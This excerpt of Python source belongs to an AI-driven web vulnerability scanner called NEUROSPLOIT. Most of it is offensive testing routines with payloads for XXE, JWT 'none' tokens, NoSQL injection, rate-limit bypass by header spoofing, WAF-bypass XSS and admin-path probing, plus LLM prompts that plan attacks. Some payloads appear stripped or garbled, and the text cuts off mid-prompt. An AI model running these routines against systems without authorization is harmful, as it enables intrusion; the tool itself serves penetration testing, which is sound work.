[self.target] + [_get_endpoint_url(ep) for ep in self.recon.endpoints[:5]]: if not endpoint: continue for payload in xxe_payloads: try: headers = {"Content-Type": "application/xml"} async with self.session.post(endpoint, data=payload, headers=headers) as resp: body = await resp.text() if "root:" in body or "daemon:" in body or "ENTITY" in body.lower(): finding = Finding( id=hashlib.md5(f"xxe{endpoint}".encode()).hexdigest()[:8], title="XXE (XML External Entity) Injection", severity="critical", vulnerability_type="xxe", cvss_score=9.1, cvss_vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", cwe_id="CWE-611", description="XML External Entity injection allows reading local files and potentially SSRF.", affected_endpoint=endpoint, payload=payload[:200], evidence=body[:500], remediation="Disable external entity processing in XML parsers. Use JSON instead of XML where possible.", ai_verified=False ) await self._add_finding(finding) await self.log("warning", f" [FOUND] XXE at {endpoint[:50]}") return except: pass async def _test_race_condition_fallback(self): """Test for race conditions without LLM""" await self.log("info", " Testing Race Conditions...") # Find form endpoints that might be vulnerable target_endpoints = [] for form in self.recon.forms[:3]: if isinstance(form, dict): action = form.get("action", "") if action: target_endpoints.append(action) if not target_endpoints: target_endpoints = [_get_endpoint_url(ep) for ep in self.recon.endpoints[:3] if _get_endpoint_url(ep)] for endpoint in target_endpoints: try: # Send multiple concurrent requests tasks = [] for _ in range(10): tasks.append(self.session.get(endpoint)) responses = await asyncio.gather(*[task.__aenter__() for task in tasks], return_exceptions=True) # Check for inconsistent responses (potential race condition indicator) statuses = [r.status for r in responses if hasattr(r, 'status')] if len(set(statuses)) > 1: await self.log("info", f" Inconsistent responses detected at {endpoint[:50]} - potential race condition") except: pass async def _test_rate_limit_fallback(self): """Test for rate limiting bypass without LLM""" await self.log("info", " Testing Rate Limiting...") headers_to_try = [ {"X-Forwarded-For": "127.0.0.1"}, {"X-Real-IP": "127.0.0.1"}, {"X-Originating-IP": "127.0.0.1"}, {"X-Client-IP": "127.0.0.1"}, {"True-Client-IP": "127.0.0.1"}, ] for endpoint in [self.target]: for headers in headers_to_try: try: # Send many requests for i in range(20): headers["X-Forwarded-For"] = f"192.168.1.{i}" async with self.session.get(endpoint, headers=headers) as resp: if resp.status == 429: await self.log("info", f" Rate limit hit at request {i}") break if i == 19: await self.log("warning", f" [POTENTIAL] No rate limiting detected with header bypass") except: pass async def _test_idor_fallback(self): """Test for IDOR/BOLA without LLM""" await self.log("info", " Testing IDOR/BOLA...") # Find endpoints with numeric parameters for param, endpoints in self.recon.parameters.items(): for endpoint in endpoints[:2]: url = _get_endpoint_url(endpoint) if isinstance(endpoint, dict) else endpoint if not url: continue # Try changing IDs for test_id in ["1", "2", "0", "-1", "9999999"]: try: parsed = urlparse(url) test_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}?{param}={test_id}" async with self.session.get(test_url) as resp: if resp.status == 200: body = await resp.text() if len(body) > 100: await self.log("debug", f" Got response for {param}={test_id}") except: pass async def _test_bfla_fallback(self): """Test for BFLA without LLM""" await self.log("info", " Testing BFLA (Broken Function Level Authorization)...") admin_paths = ["/admin", "/api/admin", "/api/v1/admin", "/manage", "/dashboard", "/internal"] for path in admin_paths: try: url = urljoin(self.target, path) async with self.session.get(url) as resp: if resp.status == 200: await self.log("warning", f" [POTENTIAL] Admin endpoint accessible: {url}") elif resp.status in [401, 403]: await self.log("debug", f" Protected: {url}") except: pass async def _test_jwt_fallback(self): """Test for JWT vulnerabilities without LLM""" await self.log("info", " Testing JWT vulnerabilities...") # Try none algorithm and other JWT attacks jwt_tests = [ "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.", "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.test", ] for endpoint in [self.target] + [_get_endpoint_url(ep) for ep in self.recon.endpoints[:3]]: if not endpoint: continue for jwt in jwt_tests: try: headers = {"Authorization": f"Bearer {jwt}"} async with self.session.get(endpoint, headers=headers) as resp: if resp.status == 200: await self.log("debug", f" JWT accepted at {endpoint[:50]}") except: pass async def _test_graphql_fallback(self): """Test for GraphQL vulnerabilities without LLM""" await self.log("info", " Testing GraphQL...") graphql_endpoints = ["/graphql", "/api/graphql", "/v1/graphql", "/query"] introspection_query = '{"query": "{ __schema { types { name } } }"}' for path in graphql_endpoints: try: url = urljoin(self.target, path) headers = {"Content-Type": "application/json"} async with self.session.post(url, data=introspection_query, headers=headers) as resp: if resp.status == 200: body = await resp.text() if "__schema" in body or "types" in body: finding = Finding( id=hashlib.md5(f"graphql{url}".encode()).hexdigest()[:8], title="GraphQL Introspection Enabled", severity="low", vulnerability_type="graphql_introspection", cvss_score=3.0, cwe_id="CWE-200", description="GraphQL introspection is enabled, exposing the entire API schema.", affected_endpoint=url, evidence=body[:500], remediation="Disable introspection in production environments.", ai_verified=False ) await self._add_finding(finding) await self.log("warning", f" [FOUND] GraphQL introspection at {url}") except: pass async def _test_nosql_fallback(self): """Test for NoSQL injection without LLM""" await self.log("info", " Testing NoSQL injection...") nosql_payloads = [ '{"$gt": ""}', '{"$ne": null}', '{"$where": "1==1"}', "[$gt]=&", '{"username": {"$gt": ""}, "password": {"$gt": ""}}', ] for param, endpoints in list(self.recon.parameters.items())[:5]: for endpoint in endpoints[:2]: url = _get_endpoint_url(endpoint) if isinstance(endpoint, dict) else endpoint if not url: continue for payload in nosql_payloads: try: test_url = f"{url.split('?')[0]}?{param}={payload}" async with self.session.get(test_url) as resp: body = await resp.text() if resp.status == 200 and len(body) > 100: await self.log("debug", f" NoSQL payload accepted: {param}={payload[:30]}") except: pass async def _test_waf_bypass_fallback(self): """Test for WAF bypass without LLM""" await self.log("info", " Testing WAF bypass techniques...") bypass_payloads = [ "", # Original "ipt>alert(1)", # Nested "", # Event handler "</script>", # Double encoding "%3Cscript%3Ealert(1)%3C/script%3E", # URL encoded ] for endpoint in [self.target]: for payload in bypass_payloads: try: test_url = f"{endpoint}?test={payload}" async with self.session.get(test_url) as resp: if resp.status == 403: await self.log("debug", f" WAF blocked: {payload[:30]}") elif resp.status == 200: body = await resp.text() if payload in body or "alert(1)" in body: await self.log("warning", f" [POTENTIAL] WAF bypass: {payload[:30]}") except: pass async def _test_csp_bypass_fallback(self): """Test for CSP bypass without LLM""" await self.log("info", " Testing CSP bypass...") try: async with self.session.get(self.target) as resp: csp = resp.headers.get("Content-Security-Policy", "") if not csp: await self.log("warning", " No CSP header found") return # Check for weak CSP weaknesses = [] if "unsafe-inline" in csp: weaknesses.append("unsafe-inline allows inline scripts") if "unsafe-eval" in csp: weaknesses.append("unsafe-eval allows eval()") if "*" in csp: weaknesses.append("Wildcard (*) in CSP is too permissive") if "data:" in csp: weaknesses.append("data: URI scheme can be abused") if weaknesses: finding = Finding( id=hashlib.md5(f"csp{self.target}".encode()).hexdigest()[:8], title="Weak Content Security Policy", severity="medium", vulnerability_type="csp_bypass", cvss_score=4.0, cwe_id="CWE-693", description=f"CSP has weaknesses: {'; '.join(weaknesses)}", affected_endpoint=self.target, evidence=f"CSP: {csp[:500]}", remediation="Remove unsafe-inline, unsafe-eval, wildcards, and data: from CSP.", ai_verified=False ) await self._add_finding(finding) await self.log("warning", f" [FOUND] Weak CSP: {', '.join(weaknesses)}") except: pass async def _ai_test_vulnerability(self, vuln_type: str): """Wrapper for backwards compatibility - now uses AI dynamic test""" await self._ai_dynamic_test(vuln_type) async def _execute_ai_test(self, test: Dict, vuln_type: str): """Execute an AI-generated test""" if not self.session: return try: url = test.get("url", self.target) method = test.get("method", "GET").upper() headers = test.get("headers", {}) params = test.get("params", {}) check = test.get("check", "") if method == "GET": async with self.session.get(url, params=params, headers=headers) as resp: body = await resp.text() response_headers = dict(resp.headers) else: async with self.session.post(url, data=params, headers=headers) as resp: body = await resp.text() response_headers = dict(resp.headers) # Use AI to analyze if vulnerability exists if self.llm.is_available() and check: analysis_prompt = f"""Analyze this response for {vuln_type} vulnerability. Check for: {check} Response status: {resp.status} Response headers: {dict(list(response_headers.items())[:10])} Response body (first 1000 chars): {body[:1000]} Is this vulnerable? Respond with: VULNERABLE: or NOT_VULNERABLE: """ result = await self.llm.generate(analysis_prompt) if "VULNERABLE:" in result.upper(): evidence = result.split(":", 1)[1].strip() if ":" in result else result finding = Finding( id=hashlib.md5(f"{vuln_type}{url}ai".encode()).hexdigest()[:8], title=f"AI-Detected {vuln_type.title()} Vulnerability", severity="medium", vulnerability_type=vuln_type, cvss_score=5.0, description=f"AI analysis detected potential {vuln_type} vulnerability.", affected_endpoint=url, evidence=evidence[:500], remediation=f"Review and remediate the {vuln_type} vulnerability.", ai_verified=True ) await self._add_finding(finding) await self.log("warning", f" [AI FOUND] {vuln_type} at {url[:50]}") except Exception as e: await self.log("debug", f" AI test execution error: {e}") async def _test_single_param(self, base_url: str, param: str, payload: str, vuln_type: str): """Test a single parameter with a payload""" if not self.session: return try: # Build test URL parsed = urlparse(base_url) base = f"{parsed.scheme}://{parsed.netloc}{parsed.path}" test_url = f"{base}?{param}={payload}" async with self.session.get(test_url) as resp: body = await resp.text() response_data = { "status": resp.status, "body": body, "headers": dict(resp.headers), "url": str(resp.url), "method": "GET", "content_type": resp.headers.get("Content-Type", "") } is_vuln, evidence = await self._verify_vulnerability(vuln_type, payload, response_data) if is_vuln: await self.log("warning", f" [POTENTIAL] {vuln_type.upper()} found in {param}") # Confirm with AI confirmed = await self._ai_confirm_finding( vuln_type, test_url, param, payload, body[:500], evidence ) if confirmed: finding = self._create_finding(vuln_type, test_url, param, payload, evidence, response_data) await self._add_finding(finding) except Exception as e: await self.log("debug", f" Test error: {e}") async def log_script(self, level: str, message: str): """Log a script/tool message""" await self.log(level, message) async def log_llm(self, level: str, message: str): """Log an LLM/AI message - prefixed with [AI] or [LLM]""" if not message.startswith('[AI]') and not message.startswith('[LLM]'): message = f"[AI] {message}" await self.log(level, message) async def _add_finding(self, finding: Finding): """Add a finding and notify via callback""" self.findings.append(finding) await self.log("warning", f" [FOUND] {finding.title} - {finding.severity}") if self.finding_callback: try: await self.finding_callback(asdict(finding)) except Exception as e: print(f"Finding callback error: {e}") def _normalize_target(self, target: str) -> str: """Ensure target has proper scheme""" if not target.startswith(('http://', 'https://')): return f"https://{target}" return target async def _default_log(self, level: str, message: str): timestamp = datetime.utcnow().strftime("%H:%M:%S") print(f"[{timestamp}] [{level.upper()}] {message}") async def __aenter__(self): connector = aiohttp.TCPConnector(ssl=False, limit=30) timeout = aiohttp.ClientTimeout(total=30, connect=10) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", } headers.update(self.auth_headers) self.session = aiohttp.ClientSession( connector=connector, timeout=timeout, headers=headers, cookie_jar=aiohttp.CookieJar(unsafe=True) ) return self async def __aexit__(self, *args): if self.session: await self.session.close() async def run(self) -> Dict[str, Any]: """Main execution method""" await self.log("info", "=" * 60) await self.log("info", " NEUROSPLOIT AI SECURITY AGENT") await self.log("info", "=" * 60) await self.log("info", f"Target: {self.target}") await self.log("info", f"Mode: {self.mode.value}") if self.llm.is_available(): await self.log("success", f"LLM Provider: {self.llm.provider.upper()} (Connected)") else: await self.log("error", "=" * 60) await self.log("error", " WARNING: LLM NOT CONFIGURED!") await self.log("error", "=" * 60) await self.log("warning", "Set ANTHROPIC_API_KEY in .env file") await self.log("warning", "Running with basic detection only (no AI enhancement)") if self.llm.error_message: await self.log("warning", f"Reason: {self.llm.error_message}") await self.log("info", "") try: if self.mode == OperationMode.RECON_ONLY: return await self._run_recon_only() elif self.mode == OperationMode.FULL_AUTO: return await self._run_full_auto() elif self.mode == OperationMode.PROMPT_ONLY: return await self._run_prompt_only() elif self.mode == OperationMode.ANALYZE_ONLY: return await self._run_analyze_only() else: return await self._run_full_auto() except Exception as e: await self.log("error", f"Agent error: {str(e)}") import traceback traceback.print_exc() return self._generate_error_report(str(e)) async def _update_progress(self, progress: int, phase: str): if self.progress_callback: await self.progress_callback(progress, phase) # ==================== RECONNAISSANCE ==================== async def _run_recon_only(self) -> Dict: """Comprehensive reconnaissance""" await self._update_progress(0, "Starting reconnaissance") # Phase 1: Initial probe await self.log("info", "[PHASE 1/4] Initial Probe") await self._initial_probe() await self._update_progress(25, "Initial probe complete") # Phase 2: Endpoint discovery await self.log("info", "[PHASE 2/4] Endpoint Discovery") await self._discover_endpoints() await self._update_progress(50, "Endpoint discovery complete") # Phase 3: Parameter discovery await self.log("info", "[PHASE 3/4] Parameter Discovery") await self._discover_parameters() await self._update_progress(75, "Parameter discovery complete") # Phase 4: Technology detection await self.log("info", "[PHASE 4/4] Technology Detection") await self._detect_technologies() await self._update_progress(100, "Reconnaissance complete") return self._generate_recon_report() async def _initial_probe(self): """Initial probe of the target""" try: async with self.session.get(self.target, allow_redirects=True) as resp: self.recon.live_hosts.append(self.target) body = await resp.text() # Extract base information await self._extract_links(body, self.target) await self._extract_forms(body, self.target) await self._extract_js_files(body, self.target) await self.log("info", f" Target is live: {resp.status}") except Exception as e: await self.log("error", f" Target probe failed: {e}") async def _discover_endpoints(self): """Discover endpoints through crawling and common paths""" # Common paths to check common_paths = [ "/", "/admin", "/login", "/api", "/api/v1", "/api/v2", "/user", "/users", "/account", "/profile", "/dashboard", "/search", "/upload", "/download", "/file", "/files", "/config", "/settings", "/admin/login", "/wp-admin", "/robots.txt", "/sitemap.xml", "/.git/config", "/api/users", "/api/login", "/graphql", "/api/graphql", "/swagger", "/api-docs", "/docs", "/health", "/status" ] base = self.target.rstrip('/') parsed_target = urlparse(self.target) # Add known vulnerable endpoints for common test sites if "vulnweb" in parsed_target.netloc or "testphp" in parsed_target.netloc: await self.log("info", " Detected test site - adding known vulnerable endpoints") common_paths.extend([ "/listproducts.php?cat=1", "/artists.php?artist=1", "/search.php?test=1", "/guestbook.php", "/comment.php?aid=1", "/showimage.php?file=1", "/product.php?pic=1", "/hpp/?pp=12", "/AJAX/index.php", "/secured/newuser.php", ]) elif "juice-shop" in parsed_target.netloc or "juiceshop" in parsed_target.netloc: common_paths.extend([ "/rest/products/search?q=test", "/api/Users", "/api/Products", "/rest/user/login", ]) elif "dvwa" in parsed_target.netloc: common_paths.extend([ "/vulnerabilities/sqli/?id=1&Submit=Submit", "/vulnerabilities/xss_r/?name=test", "/vulnerabilities/fi/?page=include.php", ]) tasks = [] for path in common_paths: tasks.append(self._check_endpoint(f"{base}{path}")) await asyncio.gather(*tasks, return_exceptions=True) # Crawl discovered pages for more endpoints for endpoint in list(self.recon.endpoints)[:10]: await self._crawl_page(_get_endpoint_url(endpoint)) await self.log("info", f" Found {len(self.recon.endpoints)} endpoints") async def _check_endpoint(self, url: str): """Check if endpoint exists""" try: async with self.session.get(url, allow_redirects=False) as resp: if resp.status not in [404, 403, 500, 502, 503]: endpoint_data = { "url": url, "method": "GET", "status": resp.status, "content_type": resp.headers.get("Content-Type", ""), "path": urlparse(url).path } if endpoint_data not in self.recon.endpoints: self.recon.endpoints.append(endpoint_data) except: pass async def _crawl_page(self, url: str): """Crawl a page for more links""" if not url: return try: async with self.session.get(url) as resp: body = await resp.text() await self._extract_links(body, url) except: pass async def _extract_links(self, body: str, base_url: str): """Extract links from HTML""" # Find href links hrefs = re.findall(r'href=["\']([^"\']+)["\']', body, re.I) # Find src links srcs = re.findall(r'src=["\']([^"\']+)["\']', body, re.I) # Find action links actions = re.findall(r'action=["\']([^"\']+)["\']', body, re.I) base_parsed = urlparse(base_url) base_domain = f"{base_parsed.scheme}://{base_parsed.netloc}" for link in hrefs + actions: if link.startswith('/'): full_url = base_domain + link elif link.startswith('http') and base_parsed.netloc in link: full_url = link else: continue # Skip external links and assets if any(ext in link.lower() for ext in ['.css', '.png', '.jpg', '.gif', '.ico', '.svg']): continue endpoint_data = { "url": full_url, "method": "GET", "path": urlparse(full_url).path } if endpoint_data not in self.recon.endpoints and len(self.recon.endpoints) < 100: self.recon.endpoints.append(endpoint_data) async def _extract_forms(self, body: str, base_url: str): """Extract forms from HTML""" form_pattern = r']*>(.*?)' forms = re.findall(form_pattern, body, re.I | re.DOTALL) base_parsed = urlparse(base_url) for form_html in forms: # Extract action action_match = re.search(r'action=["\']([^"\']*)["\']', form_html, re.I) action = action_match.group(1) if action_match else base_url if action.startswith('/'): action = f"{base_parsed.scheme}://{base_parsed.netloc}{action}" elif not action.startswith('http'): action = base_url # Extract method method_match = re.search(r'method=["\']([^"\']*)["\']', form_html, re.I) method = (method_match.group(1) if method_match else "GET").upper() # Extract inputs inputs = re.findall(r']*name=["\']([^"\']+)["\'][^>]*>', form_html, re.I) textareas = re.findall(r']*name=["\']([^"\']+)["\']', form_html, re.I) form_data = { "action": action, "method": method, "inputs": inputs + textareas } self.recon.forms.append(form_data) async def _extract_js_files(self, body: str, base_url: str): """Extract JavaScript files""" js_files = re.findall(r'src=["\']([^"\']*\.js)["\']', body, re.I) base_parsed = urlparse(base_url) for js in js_files[:10]: if js.startswith('/'): full_url = f"{base_parsed.scheme}://{base_parsed.netloc}{js}" elif js.startswith('http'): full_url = js else: continue if full_url not in self.recon.js_files: self.recon.js_files.append(full_url) # Try to extract API endpoints from JS await self._extract_api_from_js(full_url) async def _extract_api_from_js(self, js_url: str): """Extract API endpoints from JavaScript files""" try: async with self.session.get(js_url) as resp: content = await resp.text() # Find API patterns api_patterns = [ r'["\']/(api/[^"\']+)["\']', r'["\']/(v[0-9]/[^"\']+)["\']', r'fetch\s*\(\s*["\']([^"\']+)["\']', r'axios\.[a-z]+\s*\(\s*["\']([^"\']+)["\']', ] for pattern in api_patterns: matches = re.findall(pattern, content) for match in matches[:5]: if match.startswith('/'): base = urlparse(self.target) full_url = f"{base.scheme}://{base.netloc}{match}" else: full_url = match if full_url not in self.recon.api_endpoints: self.recon.api_endpoints.append(full_url) except: pass async def _discover_parameters(self): """Discover parameters in endpoints""" for endpoint in self.recon.endpoints[:20]: url = _get_endpoint_url(endpoint) parsed = urlparse(url) # Extract query parameters if parsed.query: params = parse_qs(parsed.query) self.recon.parameters[url] = list(params.keys()) # Also get parameters from forms for form in self.recon.forms: self.recon.parameters[form['action']] = form.get('inputs', []) total_params = sum(len(v) for v in self.recon.parameters.values()) await self.log("info", f" Found {total_params} parameters in {len(self.recon.parameters)} endpoints") async def _detect_technologies(self): """Detect technologies used""" try: async with self.session.get(self.target) as resp: headers = dict(resp.headers) body = await resp.text() # Server header if "Server" in headers: self.recon.technologies.append(f"Server: {headers['Server']}") # X-Powered-By if "X-Powered-By" in headers: self.recon.technologies.append(headers["X-Powered-By"]) # Technology signatures signatures = { "WordPress": ["wp-content", "wp-includes", "wordpress"], "Laravel": ["laravel", "XSRF-TOKEN", "laravel_session"], "Django": ["csrfmiddlewaretoken", "__admin__", "django"], "Express.js": ["express", "X-Powered-By: Express"], "ASP.NET": ["__VIEWSTATE", "asp.net", ".aspx"], "PHP": [".php", "PHPSESSID"], "React": ["react", "_reactRoot", "__REACT"], "Angular": ["ng-app", "ng-", "angular"], "Vue.js": ["vue", "__VUE", "v-if", "v-for"], "jQuery": ["jquery", "$.ajax"], "Bootstrap": ["bootstrap", "btn-primary"], } body_lower = body.lower() headers_str = str(headers).lower() for tech, patterns in signatures.items(): if any(p.lower() in body_lower or p.lower() in headers_str for p in patterns): if tech not in self.recon.technologies: self.recon.technologies.append(tech) except Exception as e: await self.log("debug", f"Tech detection error: {e}") await self.log("info", f" Detected: {', '.join(self.recon.technologies[:5]) or 'Unknown'}") # ==================== VULNERABILITY TESTING ==================== async def _run_full_auto(self) -> Dict: """Full automated assessment""" await self._update_progress(0, "Starting full assessment") # Phase 1: Reconnaissance await self.log("info", "[PHASE 1/5] Reconnaissance") await self._run_recon_only() await self._update_progress(20, "Reconnaissance complete") # Phase 2: AI Attack Surface Analysis await self.log("info", "[PHASE 2/5] AI Attack Surface Analysis") attack_plan = await self._ai_analyze_attack_surface() await self._update_progress(30, "Attack surface analyzed") # Phase 3: Vulnerability Testing await self.log("info", "[PHASE 3/5] Vulnerability Testing") await self._test_all_vulnerabilities(attack_plan) await self._update_progress(70, "Vulnerability testing complete") # Phase 4: AI Finding Enhancement await self.log("info", "[PHASE 4/5] AI Finding Enhancement") await self._ai_enhance_findings() await self._update_progress(90, "Findings enhanced") # Phase 5: Report Generation await self.log("info", "[PHASE 5/5] Report Generation") report = await self._generate_full_report() await self._update_progress(100, "Assessment complete") return report async def _ai_analyze_attack_surface(self) -> Dict: """Use AI to analyze attack surface""" if not self.llm.is_available(): return self._default_attack_plan() # Build detailed context for AI analysis endpoint_details = [] for ep in self.recon.endpoints[:15]: url = _get_endpoint_url(ep) method = _get_endpoint_method(ep) parsed = urlparse(url) params = list(parse_qs(parsed.query).keys()) if parsed.query else [] endpoint_details.append(f" - [{method}] {parsed.path or '/'}" + (f" params: {params}" if params else "")) form_details = [] for form in self.recon.forms[:10]: if isinstance(form, str): form_details.append(f" - {form}") continue action = form.get('action', 'unknown') if isinstance(form, dict) else str(form) method = form.get('method', 'GET').upper() if isinstance(form, dict) else 'GET' inputs = form.get('inputs', []) if isinstance(form, dict) else [] fields = [] for f in inputs[:5]: if isinstance(f, str): fields.append(f) elif isinstance(f, dict): fields.append(f.get('name', 'unnamed')) form_details.append(f" - [{method}] {action} fields: {fields}") context = f"""**Target Analysis Request** Target: {self.target} Scope: Web Application Security Assessment User Instructions: {self.custom_prompt or 'Comprehensive security assessment'} **Reconnaissance Summary:** Technologies Detected: {', '.join(self.recon.technologies) if self.recon.technologies else 'Not yet identified'} Endpoints Discovered ({len(self.recon.endpoints)} total): {chr(10).join(endpoint_details) if endpoint_details else ' None yet'} Forms Found ({len(self.recon.forms)} total): {chr(10).join(form_details) if form_details else ' None yet'} Parameters Identified: {list(self.recon.parameters.keys())[:15] if self.recon.parameters else 'None yet'} API Endpoints: {self.recon.api_endpoints[:5] if self.recon.api_endpoints else 'None identified'}""" prompt = f"""Analyze this attack surface and create a prioritized, focused testing plan. {context} **Analysis Requirements:** 1. **Technology-Based Prioritization:** - If PHP detected → prioritize LFI, RCE, Type Juggling - If ASP.NET/Java → prioritize Deserialization, XXE - If Node.js → prioritize Prototype Pollution, SSRF - If API/REST → prioritize IDOR, Mass Assignment, JWT issues 2. **High-Risk Endpoint Identification:** - Login/authentication endpoints - File upload/download functionality - Admin/management interfaces - API endpoints with user input - Search/query parameters 3. **Parameter Risk Assessment:** - Parameters named: id, user, file, path, url, redirect, callback - Hidden form fields - Parameters accepting complex input 4. **Attack Vector Suggestions:** - Specific payloads based on detected technologies - Chained attack scenarios - Business logic flaws to test **Respond in JSON format:** {{ "priority_vulns": ["sqli", "xss", "idor", "lfi"], "high_risk_endpoints": ["/api/users", "/admin/upload"], "focus_parameters": ["id", "file", "redirect"], "attack_vectors": [ "Test user ID parameter for IDOR", "Check file upload for unrestricted types", "Test search parameter for SQL injection" ], "technology_specific_tests": ["PHP: test include parameters", "Check for Laravel debug mode"] }}""" try: response = await self.llm.generate(prompt, "You are an experienced penetration tester planning an assessment. Prioritize based on real-world attack patterns and the specific technologies detected. Be specific and actionable.") match = re.search(r'\{.*\}', response, re.DOTALL) if match: return json.loads(match.group()) except Exception as e: await self.log("debug", f"AI analysis error: {e}") return self._default_attack_plan() def _default_attack_plan(self) -> Dict: """Default attack plan""" return { "priority_vulns": ["sqli", "xss", "lfi", "ssti", "ssrf"], "high_risk_endpoints": [_get_endpoint_url(e) for e in self.recon.endpoints[:10]], "focus_parameters": [], "attack_vectors": [] } async def _test_all_vulnerabilities(self, plan: Dict): """Test for all vulnerability types""" vuln_types = plan.get("priority_vulns", ["sqli", "xss", "lfi", "ssti"]) await self.log("info", f" Testing for: {', '.join(vuln_types)}") # Get testable endpoints test_targets = [] # Add endpoints with parameters (extract params from URL if present) for endpoint in self.recon.endpoints[:20]: url = _get_endpoint_url(endpoint) parsed = urlparse(url) base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}" if parsed.query: # URL has parameters - extract them params = list(parse_qs(parsed.query).keys()) test_targets.append({ "url": base_url, "method": "GET", "params": params, "original_url": url }) await self.log("debug", f" Found endpoint with params: {url[:60]}... params={params}") elif url in self.recon.parameters: test_targets.append({"url": url, "method": "GET", "params": self.recon.parameters[url]}) # Add forms for form in self.recon.forms[:10]: test_targets.append({ "url": form['action'], "method": form['method'], "params": form.get('inputs', []) }) # If no parameterized endpoints, test base endpoints with common params if not test_targets: await self.log("warning", " No parameterized endpoints found, testing with common params") for endpoint in self.recon.endpoints[:5]: test_targets.append({ "url": _get_endpoint_url(endpoint), "method": "GET", "params": ["id", "q", "search", "page", "file", "url", "cat", "artist", "item"] }) # Also test the main target with common params test_targets.append({ "url": self.target, "method": "GET", "params": ["id", "q", "search", "page", "file", "url", "path", "redirect", "cat", "item"] }) await self.log("info", f" Total targets to test: {len(test_targets)}") for target in test_targets: # Check for cancellation if self.is_cancelled(): await self.log("warning", "Scan cancelled by user") return url = target.get('url', '') await self.log("info", f" Testing: {url[:60]}...") for vuln_type in vuln_types: if self.is_cancelled(): return finding = await self._test_vulnerability_type( url, vuln_type, target.get('method', 'GET'), target.get('params', []) ) if finding: await self._add_finding(finding) async def _test_vulnerability_type(self, url: str, vuln_type: str, method: str = "GET", params: List[str] = None) -> Optional[Finding]: """Test for a specific vulnerability type""" payloads = self.PAYLOADS.get(vuln_type, []) parsed = urlparse(url) base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}" # Get existing params or use provided existing_params = parse_qs(parsed.query) if parsed.query else {} test_params = params or list(existing_params.keys()) or ["id", "q", "search"] for payload in payloads[:8]: for param in test_params[:5]: # Skip if already tested test_key = f"{base_url}:{param}:{vuln_type}:{hash(payload) % 10000}" if test_key in self.tested_payloads: continue self.tested_payloads.add(test_key) try: # Build request test_data = {**existing_params, param: payload} # First, get baseline response baseline_resp = await self._make_request(base_url, method, {param: "test123"}) # Test with payload test_resp = await self._make_request(base_url, method, test_data) if not test_resp: continue # Check for vulnerability is_vuln, evidence = await self._verify_vulnerability( vuln_type, payload, test_resp, baseline_resp ) if is_vuln: # Double-check with AI to avoid false positives if self.llm.is_available(): confirmed = await self._ai_confirm_finding( vuln_type, url, param, payload, test_resp.get('body', '')[:2000], evidence ) if not confirmed: continue return self._create_finding( vuln_type, url, param, payload, evidence, test_resp ) except asyncio.TimeoutError: # Timeout might indicate blind injection if vuln_type == "sqli" and "SLEEP" in payload.upper(): return self._create_finding( vuln_type, url, param, payload, "Request timeout - possible time-based blind SQLi", {"status": "timeout"} ) except Exception as e: await self.log("debug", f"Test error: {e}") return None async def _make_request(self, url: str, method: str, params: Dict) -> Optional[Dict]: """Make HTTP request and return response details""" try: if method.upper() == "GET": async with self.session.get(url, params=params, allow_redirects=False) as resp: body = await resp.text() return { "status": resp.status, "body": body, "headers": dict(resp.headers), "url": str(resp.url) } else: async with self.session.post(url, data=params, allow_redirects=False) as resp: body = await resp.text() return { "status": resp.status, "body": body, "headers": dict(resp.headers), "url": str(resp.url) } except Exception as e: return None async def _verify_vulnerability(self, vuln_type: str, payload: str, response: Dict, baseline: Optional[Dict]) -> Tuple[bool, str]: """Verify if response indicates vulnerability""" body = response.get('body', '').lower() body_original = response.get('body', '') # Keep original case for some checks status = response.get('status', 0) if vuln_type == "sqli": indicators = self.VULN_INDICATORS["sqli"]["errors"] for indicator in indicators: if indicator in body: await self.log("debug", f" SQLi indicator found: {indicator}") return True, f"SQL error message: '{indicator}'" # Additional SQL error patterns sql_error_patterns = [ "mysql", "mysqli", "pg_", "sqlite", "oracle", "mssql", "syntax error", "unexpected", "unterminated", "quoted string", "warning:", "error:", "fatal error", "exception", "jdbc", "odbc", "sqlstate", "native client" ] for pattern in sql_error_patterns: if pattern in body: await self.log("debug", f" SQLi pattern found: {pattern}") return True, f"SQL error pattern: '{pattern}'" # Check for different response indicating SQL injection if baseline: baseline_body = baseline.get('body', '') diff = abs(len(body) - len(baseline_body)) # More aggressive detection for boolean-based SQLi if diff > 100 and ("OR" in payload.upper() or "AND" in payload.upper()): await self.log("debug", f" SQLi response size diff: {diff}") return True, f"Response size changed significantly ({diff} chars) - possible boolean-based SQLi" elif vuln_type == "xss": # Check if payload is reflected without encoding payload_lower = payload.lower() if payload in body_original or payload.lower() in body: # Verify it's in a dangerous context if ') if '<' in payload and '<' in body_original and '<' not in body_original: # Check if our specific tag made it through for tag in [' bool: """Use AI to confirm finding and reduce false positives""" # If LLM not available, trust the technical verification if not self.llm.is_available(): await self.log("debug", f" LLM not available, trusting technical verification for {vuln_type}") return True prompt = f"""Analyze this potential {vuln_type.upper()} vulnerability and determine if it's REAL or a FALSE POSITIVE. **Target Information:** - URL: {url} - Vulnerable Parameter: {param} - Payload Used: {payload} - Evidence Found: {evidence} **Response Excerpt:** ``` {response[:1500]} ``` **Vulnerability-Specific Analysis Required:** For {vuln_type.upper()}, confirm ONLY if: {"- The injected SQL syntax causes a database error OR returns different data than normal input" if vuln_type == "sqli" else ""} {"- The JavaScript payload appears UNESCAPED in the response body (not just reflected)" if vuln_type == "xss" else ""} {"- The file content (e.g., /etc/passwd, win.ini) appears in the response" if vuln_type == "lfi" else ""} {"- The template expression was EVALUATED (e.g., 7*7 became 49, not {{7*7}})" if vuln_type == "ssti" else ""} {"- Internal/cloud resources were accessed (metadata, localhost content)" if vuln_type == "ssrf" else ""} {"- Command output (uid=, gid=, directory listing) appears in response" if vuln_type == "rce" else ""} **Critical 